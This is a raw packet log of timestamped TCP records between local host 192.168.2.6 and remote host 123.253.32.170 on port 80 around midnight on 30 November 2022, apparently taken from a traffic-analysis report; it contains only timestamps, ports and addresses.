                                                            Nov 30, 2022 00:11:09.239990950 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240020037 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240036964 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240053892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240066051 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240091085 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240096092 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240123034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240135908 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240165949 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240186930 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240197897 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240209103 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240238905 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240263939 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240267992 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240294933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240310907 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240326881 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240343094 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240370035 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240389109 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240390062 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240390062 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240400076 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240420103 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240428925 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240443945 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240458965 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240487099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240489006 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240508080 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240514040 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240524054 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240542889 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240570068 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240587950 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240587950 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240598917 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240612984 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240627050 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240643024 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240654945 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240664959 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240683079 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240700006 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240711927 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240731955 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240740061 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240756989 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240767956 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240787029 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240797043 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240811110 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240825891 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240833044 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240854025 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240869999 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240881920 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240894079 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240911007 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240930080 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240940094 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240953922 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240967989 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.240983963 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.240997076 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.241007090 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.241027117 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.241025925 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.241056919 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.241071939 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.241095066 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.242922068 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.285476923 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.285676956 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.370309114 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.370554924 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.390938997 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.394412994 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.661911964 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.661950111 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.662139893 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.664438963 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664522886 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664591074 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664628983 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.664660931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664724112 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664737940 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.664792061 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664855003 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.664859056 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664923906 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.664974928 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.664987087 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665055037 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665102005 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665122986 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665188074 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665235043 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665252924 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665323019 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665374994 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665391922 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665460110 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665509939 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665528059 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665591955 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665640116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665657043 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665723085 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665776014 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665790081 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665854931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665900946 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.665920019 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.665986061 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666033030 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666049957 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666116953 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666166067 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666182995 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666253090 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666307926 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666346073 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666389942 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666440010 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666459084 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666523933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666563988 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666570902 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666614056 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666657925 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666670084 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666699886 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666743994 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666743994 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666807890 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666861057 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.666872025 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.666991949 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667048931 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667058945 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667104006 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667148113 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667150021 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667205095 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667254925 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667289019 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667361975 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667421103 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667438030 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667495012 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667536020 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667538881 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667582989 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667649031 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667650938 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667717934 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667764902 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.667910099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.667980909 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668035984 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668051004 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668123007 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668174028 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668179035 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668224096 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668268919 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668267965 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668312073 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668365002 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668379068 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668464899 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668500900 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668509960 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668560028 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668603897 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668605089 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668677092 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668716908 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668728113 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668803930 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668840885 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668850899 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668895960 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668941021 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668951988 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.668984890 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.668994904 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669029951 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669030905 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669081926 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669090033 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669143915 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669161081 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669213057 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669240952 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669289112 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669290066 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669334888 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669343948 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669383049 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669403076 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669454098 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669472933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669519901 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669542074 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669594049 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669595957 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669636965 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669641018 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669677973 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669678926 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669720888 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669730902 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669764996 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669768095 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669807911 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669836998 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669850111 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669850111 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.669900894 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.669967890 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670017958 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670039892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670083046 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670089006 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670125008 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670141935 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670170069 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670191050 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670234919 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670247078 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670288086 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670317888 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670356035 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670412064 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670454025 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670496941 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670543909 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670547962 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670588970 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670609951 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670681953 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670738935 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670780897 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670830011 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670845032 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.670890093 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670907021 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.670917988 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671004057 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671036005 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671075106 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671096087 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671128988 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671128988 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671142101 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671185017 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671188116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671228886 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671230078 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671293974 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671363115 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671391964 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.671490908 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671535969 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671576977 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671649933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671683073 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.671895981 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.689528942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.931943893 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.931994915 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.932061911 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.932136059 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.941906929 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.941941023 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.941987038 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942013979 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942033052 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942040920 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942056894 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942066908 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942106962 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942116022 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942143917 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942148924 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942172050 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942173004 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942189932 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942219973 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942224979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942243099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942257881 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942281961 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942286015 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942311049 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942327023 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942334890 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942343950 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942358971 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942375898 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942399979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942415953 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942451954 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942456961 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942486048 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942508936 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942512989 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942524910 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942549944 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942567110 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942612886 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942619085 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942641020 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942653894 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942667961 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942699909 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942713022 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942724943 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942738056 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942750931 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942774057 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942780018 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942802906 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942816973 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942842007 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942843914 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942898035 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942935944 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942961931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.942980051 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.942986965 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.943005085 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.943044901 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:09.943048954 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:09.943089008 CET8049725123.253.32.170192.168.2.6
